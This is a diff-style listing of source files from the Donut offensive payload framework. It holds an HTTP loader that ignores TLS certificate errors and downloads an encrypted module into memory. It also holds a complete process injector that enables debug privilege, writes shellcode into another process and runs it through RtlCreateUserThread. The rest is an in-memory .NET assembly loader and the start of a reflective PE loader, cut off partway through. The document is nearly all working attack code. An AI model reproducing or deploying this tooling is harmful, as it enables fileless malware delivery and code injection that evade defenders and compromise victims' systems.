50 uc.lpszHostName = host;
51 uc.lpszUrlPath = file;
52 uc.dwHostNameLength = DONUT_MAX_URL;
53 uc.dwUrlPathLength = DONUT_MAX_URL;
54
55 DPRINT("Decoding URL %s", inst->http.url);
56
57 if(!inst->api.InternetCrackUrl(
58 inst->http.url, 0, ICU_DECODE, &uc)) {
59 return FALSE;
60 }
61
62 bSecure = (uc.nScheme == INTERNET_SCHEME_HTTPS);
63
64 // if secure connection, update the flags to ignore
65 // invalid certificates
66 if(bSecure) {
67 flags |= INTERNET_FLAG_IGNORE_CERT_CN_INVALID |
68 INTERNET_FLAG_IGNORE_CERT_DATE_INVALID |
69 INTERNET_FLAG_SECURE;
70 }
71
72 DPRINT("Initializing WININET");
73
74 hin = inst->api.InternetOpen(
75 NULL, INTERNET_OPEN_TYPE_PRECONFIG,
76 NULL, NULL, 0);
77
78 if(hin == NULL) return FALSE;
79
80 DPRINT("Creating %s connection for %s",
81 bSecure ? "HTTPS" : "HTTP", host);
82
83 con = inst->api.InternetConnect(
84 hin, host,
85 bSecure ? INTERNET_DEFAULT_HTTPS_PORT : INTERNET_DEFAULT_HTTP_PORT,
86 NULL, NULL,
87 INTERNET_SERVICE_HTTP, 0, 0);
88
89 if(con != NULL) {
90 DPRINT("Creating HTTP %s request for %s",
91 inst->http.req, file);
92
93 req = inst->api.HttpOpenRequest(
94 con, inst->http.req,
95 file, NULL, NULL, NULL, flags, 0);
96
97 if(req != NULL) {
98
99 // see if we should ignore invalid certificates for this request
100 if(bSecure) {
101 if(flags & INTERNET_FLAG_IGNORE_CERT_CN_INVALID) {
102 n = sizeof (s);
103
104 s = SECURITY_FLAG_IGNORE_UNKNOWN_CA |
105 SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
106 SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
107 SECURITY_FLAG_IGNORE_WRONG_USAGE |
108 SECURITY_FLAG_IGNORE_REVOCATION;
109
110 DPRINT("Setting option to ignore invalid certificates");
111
112 inst->api.InternetSetOption(
113 req,
114 INTERNET_OPTION_SECURITY_FLAGS,
115 &s,
116 sizeof(s));
117 }
118 }
119 DPRINT("Sending request");
120
121 if(inst->api.HttpSendRequest(req, NULL, 0, NULL, 0)) {
122 len = sizeof(DWORD);
123 code = 0;
124 DPRINT("Querying status code");
125
126 if(inst->api.HttpQueryInfo(
127 req,
128 HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER,
129 &code, &len, 0))
130 {
131 DPRINT("Code is %ld", code);
132
133 if(code == HTTP_STATUS_OK) {
134 DPRINT("Querying content length");
135
136 len = sizeof(SIZE_T);
137 inst->mod_len = 0;
138
139 if(inst->api.HttpQueryInfo(
140 req,
141 HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER,
142 &inst->mod_len, &len, 0))
143 {
144 if(inst->mod_len != 0) {
145 DPRINT("Allocating memory for module");
146
147 inst->module.p = inst->api.VirtualAlloc(
148 NULL, inst->mod_len,
149 MEM_COMMIT | MEM_RESERVE,
150 PAGE_READWRITE);
151
152 if(inst->module.p != NULL) {
153 rd = 0;
154 DPRINT("Downloading module into memory");
155 bResult = inst->api.InternetReadFile(
156 req,
157 inst->module.p,
158 inst->mod_len, &rd);
159 }
160 }
161 }
162 }
163 }
164 }
165 DPRINT("Closing request handle");
166 inst->api.InternetCloseHandle(req);
167 }
168 DPRINT("Closing HTTP connection");
169 inst->api.InternetCloseHandle(con);
170 }
171 DPRINT("Closing internet handle");
172 inst->api.InternetCloseHandle(hin);
173
174 #if !defined(NOCRYPTO)
175 if(bResult) {
176 PDONUT_MODULE mod = inst->module.p;
177
178 DPRINT("Decrypting %lli bytes of module", inst->mod_len);
179
180 donut_decrypt(inst->mod_key.mk,
181 inst->mod_key.ctr,
182 mod,
183 inst->mod_len);
184
185 DPRINT("Generating hash to verify decryption");
186 ULONG64 mac = maru(inst->sig, inst->iv);
187
188 DPRINT("Module : %016llx | Result : %016llx", mod->mac, mac);
189
190 if(mac != mod->mac) {
191 DPRINT("Decryption failed");
192 return FALSE;
193 }
194 }
195 #endif
196 return bResult;
197 }
+235
-0
payload/inject.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <Windows.h>
32 #include <stdio.h>
33 #include <tlhelp32.h>
34
35 #pragma comment(lib, "advapi32.lib")
36 #pragma comment(lib, "shell32.lib")
37 #pragma comment(lib, "user32.lib")
38
39 typedef struct _CLIENT_ID {
40 PVOID UniqueProcess;
41 PVOID UniqueThread;
42 } CLIENT_ID, *PCLIENT_ID;
43
44 typedef NTSTATUS (NTAPI *RtlCreateUserThread_t) (
45 IN HANDLE ProcessHandle,
46 IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
47 IN BOOLEAN CreateSuspended,
48 IN ULONG StackZeroBits,
49 IN OUT PULONG StackReserved,
50 IN OUT PULONG StackCommit,
51 IN PVOID StartAddress,
52 IN PVOID StartParameter OPTIONAL,
53 OUT PHANDLE ThreadHandle,
54 OUT PCLIENT_ID ClientID);
55
56 BOOL EnablePrivilege(PCHAR szPrivilege){
57 HANDLE hToken;
58 BOOL bResult;
59 LUID luid;
60 TOKEN_PRIVILEGES tp;
61
62 // open token for current process
63 bResult = OpenProcessToken(GetCurrentProcess(),
64 TOKEN_ADJUST_PRIVILEGES, &hToken);
65
66 if(!bResult) return FALSE;
67
68 // lookup privilege
69 bResult = LookupPrivilegeValue(NULL, szPrivilege, &luid);
70 if(bResult){
71 tp.PrivilegeCount = 1;
72 tp.Privileges[0].Luid = luid;
73 tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
74
75 // adjust token
76 bResult = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL);
77 }
78 CloseHandle(hToken);
79 return bResult;
80 }
81
82 // display error message for last error code
83 VOID xstrerror (PCHAR fmt, ...){
84 PCHAR error=NULL;
85 va_list arglist;
86 CHAR buffer[1024];
87 DWORD dwError=GetLastError();
88
89 va_start(arglist, fmt);
90 vsnprintf(buffer, ARRAYSIZE(buffer), fmt, arglist);
91 va_end (arglist);
92
93 if (FormatMessage (
94 FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
95 NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
96 (LPSTR)&error, 0, NULL))
97 {
98 printf(" [ %s : %s\n", buffer, error);
99 LocalFree (error);
100 } else {
101 printf(" [ %s error : %08lX\n", buffer, dwError);
102 }
103 }
104
105 DWORD name2pid(PCHAR procName){
106 HANDLE hSnap;
107 PROCESSENTRY32 pe32;
108 DWORD pid=0;
109
110 // create snapshot of system
111 hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
112 if(hSnap == INVALID_HANDLE_VALUE) return 0;
113
114 pe32.dwSize = sizeof(PROCESSENTRY32);
115
116 // get first process
117 if(Process32First(hSnap, &pe32)){
118 do {
119 if(!lstrcmpi(pe32.szExeFile, procName)){
120 pid=pe32.th32ProcessID;
121 break;
122 }
123 } while(Process32Next(hSnap, &pe32));
124 }
125 CloseHandle(hSnap);
126 return pid;
127 }
128
129 BOOL injectPIC(DWORD id, LPVOID code, DWORD codeLen) {
130 SIZE_T wr;
131 HANDLE hp,ht;
132 LPVOID cs;
133 RtlCreateUserThread_t pRtlCreateUserThread;
134 HMODULE hn;
135 CLIENT_ID cid;
136 NTSTATUS nt=~0UL;
137 DWORD t;
138
139 // 1. resolve API address
140 hn = GetModuleHandle("ntdll.dll");
141 pRtlCreateUserThread=(RtlCreateUserThread_t)
142 GetProcAddress(hn, "RtlCreateUserThread");
143
144 printf(" [ opening process %li\n", id);
145 // 2. open the target process
146 hp=OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);
147
148 if(hp == NULL) return FALSE;
149
150 // 3. allocate executable-read-write (XRW) memory for payload
151 printf(" [ allocating memory for payload.\n");
152 cs=VirtualAllocEx(hp, NULL, codeLen,
153 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
154
155 printf(" [ writing code to %p.\n", cs);
156 // 4. copy the payload to remote memory
157 WriteProcessMemory(hp, cs, code, codeLen, &wr);
158 VirtualProtectEx(hp, cs, codeLen, PAGE_EXECUTE_READ, &t);
159
160 printf(" [ press any key to continue.\n");
161 getchar();
162
163 // 5. execute payload in remote process
164 printf(" [ creating new thread.\n");
165 nt = pRtlCreateUserThread(hp, NULL, FALSE, 0, NULL,
166 NULL, cs, NULL, &ht, &cid);
167
168 printf(" [ nt status is %lx\n", nt);
169 WaitForSingleObject(ht, INFINITE);
170
171 // 6. close remote thread handle
172 CloseHandle(ht);
173
174 // 7. free remote memory
175 printf(" [ freeing memory.\n");
176 VirtualFreeEx(hp, cs, codeLen, MEM_RELEASE | MEM_DECOMMIT);
177
178 // 8. close remote process handle
179 CloseHandle(hp);
180 return nt == 0; // STATUS_SUCCESS
181 }
182
183 DWORD getdata(PCHAR path, LPVOID *data){
184 HANDLE hf;
185 DWORD len,rd=0;
186
187 // 1. open the file
188 hf=CreateFile(path, GENERIC_READ, 0, 0,
189 OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
190
191 if(hf!=INVALID_HANDLE_VALUE){
192 // get file size
193 len=GetFileSize(hf, 0);
194 // allocate memory
195 *data=malloc(len + 16);
196 // read file contents into memory
197 ReadFile(hf, *data, len, &rd, 0);
198 CloseHandle(hf);
199 }
200 return rd;
201 }
202
203 int main(int argc, char *argv[]){
204 LPVOID code;
205 SIZE_T code_len;
206 DWORD pid;
207
208 if (argc != 3){
209 printf("\n [ usage: inject <process id | process name> <payload.bin>\n");
210 return 0;
211 }
212
213 if(!EnablePrivilege(SE_DEBUG_NAME)) {
214 printf(" [ cannot enable SeDebugPrivilege.\n");
215 }
216
217 // get pid
218 pid=atoi(argv[1]);
219 if(pid==0) pid=name2pid(argv[1]);
220
221 if(pid==0) {
222 printf(" [ unable to obtain process id.\n");
223 return 0;
224 }
225 // pic
226 code_len = getdata(argv[2], &code);
227 if(code_len == 0) {
228 printf(" [ unable to read payload.\n");
229 return 0;
230 }
231 injectPIC(pid, code, code_len);
232 free(code);
233 return 0;
234 }
+364
-0
payload/inmem_dotnet.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 BOOL LoadAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
32 PDONUT_MODULE mod;
33 HRESULT hr = S_OK;
34 BSTR domain;
35 SAFEARRAYBOUND sab;
36 SAFEARRAY *sa;
37 DWORD i;
38 BOOL loaded=FALSE, loadable;
39 PBYTE p;
40
41 if(inst->type == DONUT_INSTANCE_PIC) {
42 DPRINT("Using module embedded in instance");
43 mod = (PDONUT_MODULE)&inst->module.x;
44 } else {
45 DPRINT("Loading module from allocated memory");
46 mod = inst->module.p;
47 }
48
49 if(inst->api.CLRCreateInstance != NULL) {
50 DPRINT("CLRCreateInstance");
51
52 hr = inst->api.CLRCreateInstance(
53 (REFCLSID)&inst->xCLSID_CLRMetaHost,
54 (REFIID)&inst->xIID_ICLRMetaHost,
55 (LPVOID*)&pa->icmh);
56
57 if(SUCCEEDED(hr)) {
58 DPRINT("ICLRMetaHost::GetRuntime(\"%ws\")", mod->runtime);
59
60 hr = pa->icmh->lpVtbl->GetRuntime(
61 pa->icmh, mod->runtime,
62 (REFIID)&inst->xIID_ICLRRuntimeInfo, (LPVOID)&pa->icri);
63
64 if(SUCCEEDED(hr)) {
65 DPRINT("ICLRRuntimeInfo::IsLoadable");
66 hr = pa->icri->lpVtbl->IsLoadable(pa->icri, &loadable);
67
68 if(SUCCEEDED(hr) && loadable) {
69 DPRINT("ICLRRuntimeInfo::GetInterface");
70
71 hr = pa->icri->lpVtbl->GetInterface(
72 pa->icri,
73 (REFCLSID)&inst->xCLSID_CorRuntimeHost,
74 (REFIID)&inst->xIID_ICorRuntimeHost,
75 (LPVOID)&pa->icrh);
76
77 DPRINT("HRESULT: %08lx", hr);
78 }
79 } else pa->icri = NULL;
80 } else pa->icmh = NULL;
81 }
82 if(FAILED(hr)) {
83 DPRINT("CorBindToRuntime");
84
85 hr = inst->api.CorBindToRuntime(
86 NULL, // load whatever's available
87 NULL, // load workstation build
88 &inst->xCLSID_CorRuntimeHost,
89 &inst->xIID_ICorRuntimeHost,
90 (LPVOID*)&pa->icrh);
91
92 DPRINT("HRESULT: %08lx", hr);
93 }
94
95 if(FAILED(hr)) {
96 pa->icrh = NULL;
97 return FALSE;
98 }
99 DPRINT("ICorRuntimeHost::Start");
100
101 hr = pa->icrh->lpVtbl->Start(pa->icrh);
102
103 if(SUCCEEDED(hr)) {
104 domain = inst->api.SysAllocString(mod->domain);
105
106 DPRINT("ICorRuntimeHost::CreateDomain(\"%ws\")", mod->domain);
107
108 hr = pa->icrh->lpVtbl->CreateDomain(
109 pa->icrh, domain, NULL, &pa->iu);
110
111 inst->api.SysFreeString(domain);
112
113 if(SUCCEEDED(hr)) {
114 DPRINT("IUnknown::QueryInterface");
115
116 hr = pa->iu->lpVtbl->QueryInterface(
117 pa->iu, (REFIID)&inst->xIID_AppDomain, (LPVOID)&pa->ad);
118
119 if(SUCCEEDED(hr)) {
120 sab.lLbound = 0;
121 sab.cElements = mod->len;
122 sa = inst->api.SafeArrayCreate(VT_UI1, 1, &sab);
123
124 if(sa != NULL) {
125 DPRINT("Copying %" PRIi64 " bytes of assembly to safe array", mod->len);
126
127 for(i=0, p=sa->pvData; i<mod->len; i++) {
128 p[i] = mod->data[i];
129 }
130
131 DPRINT("AppDomain::Load_3");
132
133 hr = pa->ad->lpVtbl->Load_3(
134 pa->ad, sa, &pa->as);
135
136 loaded = hr == S_OK;
137
138 DPRINT("HRESULT : %08lx", hr);
139
140 DPRINT("Erasing assembly from memory");
141
142 for(i=0, p=sa->pvData; i<mod->len; i++) {
143 p[i] = mod->data[i] = 0;
144 }
145
146 DPRINT("SafeArrayDestroy");
147 inst->api.SafeArrayDestroy(sa);
148 }
149 }
150 }
151 }
152 return loaded;
153 }
154
155 BOOL RunAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
156 SAFEARRAY *sav=NULL, *params=NULL;
157 VARIANT arg, ret, vtPsa, v1={0}, v2;
158 DWORD i;
159 PDONUT_MODULE mod;
160 HRESULT hr;
161 BSTR cls, method;
162 ULONG cnt;
163 OLECHAR str[1]={0};
164 LONG ucnt, lcnt;
165
166 if(inst->type == DONUT_INSTANCE_PIC) {
167 DPRINT("Using module embedded in instance");
168 mod = (PDONUT_MODULE)&inst->module.x;
169 } else {
170 DPRINT("Loading module from allocated memory");
171 mod = inst->module.p;
172 }
173
174 DPRINT("Type is %s",
175 mod->type == DONUT_MODULE_NET_DLL ? "DLL" : "EXE");
176
177 // if this is a program
178 if(mod->type == DONUT_MODULE_NET_EXE) {
179 // get the entrypoint
180 DPRINT("MethodInfo::EntryPoint");
181 hr = pa->as->lpVtbl->EntryPoint(pa->as, &pa->mi);
182
183 if(SUCCEEDED(hr)) {
184 // get the parameters for entrypoint
185 DPRINT("MethodInfo::GetParameters");
186 hr = pa->mi->lpVtbl->GetParameters(pa->mi, &params);
187
188 if(SUCCEEDED(hr)) {
189 DPRINT("SafeArrayGetLBound");
190 hr = inst->api.SafeArrayGetLBound(params, 1, &lcnt);
191
192 DPRINT("SafeArrayGetUBound");
193 hr = inst->api.SafeArrayGetUBound(params, 1, &ucnt);
194 cnt = ucnt - lcnt + 1;
195 DPRINT("Number of parameters for entrypoint : %i", cnt);
196
197 // does Main require string[] args?
198 if(cnt != 0) {
199 // create a 1 dimensional array for Main parameters
200 sav = inst->api.SafeArrayCreateVector(VT_VARIANT, 0, 1);
201 // if user specified their own parameters, add to string array
202 if(mod->param_cnt != 0) {
203 // create 1 dimensional array for strings[] args
204 vtPsa.vt = (VT_ARRAY | VT_BSTR);
205 vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, mod->param_cnt);
206
207 // add each string parameter
208 for(i=0; i<mod->param_cnt; i++) {
209 DPRINT("Adding \"%ws\" as parameter %i", mod->param[i], (i + 1));
210
211 inst->api.SafeArrayPutElement(vtPsa.parray,
212 &i, inst->api.SysAllocString(mod->param[i]));
213 }
214 } else {
215 DPRINT("Adding empty string for invoke_3");
216 // add empty string to make it work
217 // create 1 dimensional array for strings[] args
218 vtPsa.vt = (VT_ARRAY | VT_BSTR);
219 vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, 1);
220
221 i=0;
222 inst->api.SafeArrayPutElement(vtPsa.parray,
223 &i, inst->api.SysAllocString(str));
224 }
225 // add string array to list of parameters
226 i=0;
227 inst->api.SafeArrayPutElement(sav, &i, &vtPsa);
228 }
229 v1.vt = VT_NULL;
230 v1.plVal = NULL;
231
232 DPRINT("MethodInfo::Invoke_3()\n");
233
234 hr = pa->mi->lpVtbl->Invoke_3(pa->mi, v1, sav, &v2);
235
236 DPRINT("MethodInfo::Invoke_3 : %08lx : %s",
237 hr, SUCCEEDED(hr) ? "Success" : "Failed");
238
239 if(sav != NULL) {
240 inst->api.SafeArrayDestroy(vtPsa.parray);
241 inst->api.SafeArrayDestroy(sav);
242 }
243 }
244 } else pa->mi = NULL;
245 } else {
246 DPRINT("SysAllocString(\"%ws\")", mod->cls);
247 cls = inst->api.SysAllocString(mod->cls);
248 if(cls == NULL) return FALSE;
249
250 DPRINT("SysAllocString(\"%ws\")", mod->method);
251 method = inst->api.SysAllocString(mod->method);
252
253 if(method != NULL) {
254 DPRINT("Assembly::GetType_2");
255 hr = pa->as->lpVtbl->GetType_2(pa->as, cls, &pa->type);
256
257 if(SUCCEEDED(hr)) {
258 sav = NULL;
259 if(mod->param_cnt != 0) {
260 DPRINT("SafeArrayCreateVector(%li parameter(s))", mod->param_cnt);
261
262 sav = inst->api.SafeArrayCreateVector(
263 VT_VARIANT, 0, mod->param_cnt);
264
265 if(sav != NULL) {
266 for(i=0; i<mod->param_cnt; i++) {
267 DPRINT("Adding \"%ws\" as parameter %i", mod->param[i], (i+1));
268
269 V_BSTR(&arg) = inst->api.SysAllocString(mod->param[i]);
270 V_VT(&arg) = VT_BSTR;
271
272 hr = inst->api.SafeArrayPutElement(sav, &i, &arg);
273
274 if(FAILED(hr)) {
275 DPRINT("SafeArrayPutElement failed.");
276 inst->api.SafeArrayDestroy(sav);
277 sav = NULL;
278 }
279 }
280 }
281 }
282 if(SUCCEEDED(hr)) {
283 DPRINT("Calling Type::InvokeMember_3");
284
285 hr = pa->type->lpVtbl->InvokeMember_3(
286 pa->type,
287 method, // name of method
288 BindingFlags_InvokeMethod |
289 BindingFlags_Static |
290 BindingFlags_Public,
291 NULL,
292 v1, // empty VARIANT
293 sav, // arguments to method
294 &ret); // return code from method
295
296 DPRINT("Type::InvokeMember_3 : %08lx : %s",
297 hr, SUCCEEDED(hr) ? "Success" : "Failed");
298
299 if(sav != NULL) {
300 inst->api.SafeArrayDestroy(sav);
301 }
302 }
303 }
304 inst->api.SysFreeString(method);
305 }
306 inst->api.SysFreeString(cls);
307 }
308 return TRUE;
309 }
310
311 VOID FreeAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
312
313 if(pa->type != NULL) {
314 DPRINT("Type::Release");
315 pa->type->lpVtbl->Release(pa->type);
316 pa->type = NULL;
317 }
318
319 if(pa->mi != NULL) {
320 DPRINT("MethodInfo::Release");
321 pa->mi->lpVtbl->Release(pa->mi);
322 pa->mi = NULL;
323 }
324
325 if(pa->as != NULL) {
326 DPRINT("Assembly::Release");
327 pa->as->lpVtbl->Release(pa->as);
328 pa->as = NULL;
329 }
330
331 if(pa->ad != NULL) {
332 DPRINT("AppDomain::Release");
333 pa->ad->lpVtbl->Release(pa->ad);
334 pa->ad = NULL;
335 }
336
337 if(pa->iu != NULL) {
338 DPRINT("IUnknown::Release");
339 pa->iu->lpVtbl->Release(pa->iu);
340 pa->iu = NULL;
341 }
342
343 if(pa->icrh != NULL) {
344 DPRINT("ICorRuntimeHost::Stop");
345 pa->icrh->lpVtbl->Stop(pa->icrh);
346
347 DPRINT("ICorRuntimeHost::Release");
348 pa->icrh->lpVtbl->Release(pa->icrh);
349 pa->icrh = NULL;
350 }
351
352 if(pa->icri != NULL) {
353 DPRINT("ICLRRuntimeInfo::Release");
354 pa->icri->lpVtbl->Release(pa->icri);
355 pa->icri = NULL;
356 }
357
358 if(pa->icmh != NULL) {
359 DPRINT("ICLRMetaHost::Release");
360 pa->icmh->lpVtbl->Release(pa->icmh);
361 pa->icmh = NULL;
362 }
363 }
+249
-0
payload/inmem_pe.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifdef _WIN64
32 #define IMAGE_REL_TYPE IMAGE_REL_BASED_DIR64
33 #else
34 #define IMAGE_REL_TYPE IMAGE_REL_BASED_HIGHLOW
35 #endif
36
37 typedef struct _IMAGE_RELOC {
38 WORD offset :12;
39 WORD type :4;
40 } IMAGE_RELOC, *PIMAGE_RELOC;
41
42 typedef BOOL (WINAPI *DllMain_t)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
43 typedef VOID (WINAPI *Start_t)(VOID);
44
45 typedef void (__cdecl *call_stub_t)(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]);
46
47 // same as strcmp
48 int xstrcmp(char *s1, char *s2) {
49 while(*s1 && (*s1==*s2))s1++,s2++;
50 return (int)*(unsigned char*)s1 - *(unsigned char*)s2;
51 }
52
53 // In-Memory execution of unmanaged DLL file. YMMV with EXE files requiring subsystem..
54 VOID RunPE(PDONUT_INSTANCE inst) {
55 PIMAGE_DOS_HEADER dos, doshost;
56 PIMAGE_NT_HEADERS nt, nthost;
57 PIMAGE_SECTION_HEADER sh;
58 PIMAGE_THUNK_DATA oft, ft;
59 PIMAGE_IMPORT_BY_NAME ibn;
60 PIMAGE_IMPORT_DESCRIPTOR imp;
61 PIMAGE_EXPORT_DIRECTORY exp;
62 PIMAGE_RELOC list;
63 PIMAGE_BASE_RELOCATION ibr;
64 DWORD rva;
65 PDWORD adr;
66 PDWORD sym;
67 PWORD ord;
68 PBYTE ofs;
69 PCHAR str, name;
70 HMODULE dll;
71 ULONG_PTR ptr;
72 DllMain_t DllMain; // DLL
73 Start_t Start; // EXE
74 call_stub_t CallApi; // DLL function
75 LPVOID cs = NULL, base, host;
76 DWORD i, cnt;
77 PDONUT_MODULE mod;
78 FARPROC api=NULL; // DLL export
79
80 // write shellcode to stack. msvc sux!!
81 #include "call_api_bin.h"
82
83 if(inst->type == DONUT_INSTANCE_PIC) {
84 DPRINT("Using module embedded in instance");
85 mod = (PDONUT_MODULE)&inst->module.x;
86 } else {
87 DPRINT("Loading module from allocated memory");
88 mod = inst->module.p;
89 }
90
91 base = mod->data;
92 dos = (PIMAGE_DOS_HEADER)base;
93 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
94
95 // before doing anything. check compatibility between exe/dll and host process.
96 host = inst->api.GetModuleHandle(NULL);
97 doshost = (PIMAGE_DOS_HEADER)host;
98 nthost = RVA2VA(PIMAGE_NT_HEADERS, host, doshost->e_lfanew);
99
100 if(nt->FileHeader.Machine != nthost->FileHeader.Machine) {
101 DPRINT("Host process and payload are not compatiable...cannot load.");
102 return;
103 }
104
105 DPRINT("Allocating %" PRIi32 " (0x%" PRIx32 ") bytes of RWX memory for file",
106 nt->OptionalHeader.SizeOfImage, nt->OptionalHeader.SizeOfImage);
107
108 cs = inst->api.VirtualAlloc(
109 NULL, nt->OptionalHeader.SizeOfImage + 4096,
110 MEM_COMMIT | MEM_RESERVE,
111 PAGE_EXECUTE_READWRITE);
112
113 if(cs == NULL) return;
114
115 DPRINT("Copying each section to RWX memory %p", cs);
116 sh = IMAGE_FIRST_SECTION(nt);
117
118 for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
119 Memcpy((PBYTE)cs + sh[i].VirtualAddress,
120 (PBYTE)base + sh[i].PointerToRawData,
121 sh[i].SizeOfRawData);
122 }
123
124 DPRINT("Processing the Import Table");
125 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
126 imp = RVA2VA(PIMAGE_IMPORT_DESCRIPTOR, cs, rva);
127
128 // For each DLL
129 for (;imp->Name!=0; imp++) {
130 name = RVA2VA(PCHAR, cs, imp->Name);
131
132 DPRINT("Loading %s", name);
133 dll = inst->api.LoadLibraryA(name);
134
135 // Resolve the API for this library
136 oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk);
137 ft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk);
138
139 // For each API
140 for (;; oft++, ft++) {
141 // No API left?
142 if (oft->u1.AddressOfData == 0) break;
143
144 PULONG_PTR func = (PULONG_PTR)&ft->u1.Function;
145
146 // Resolve by ordinal?
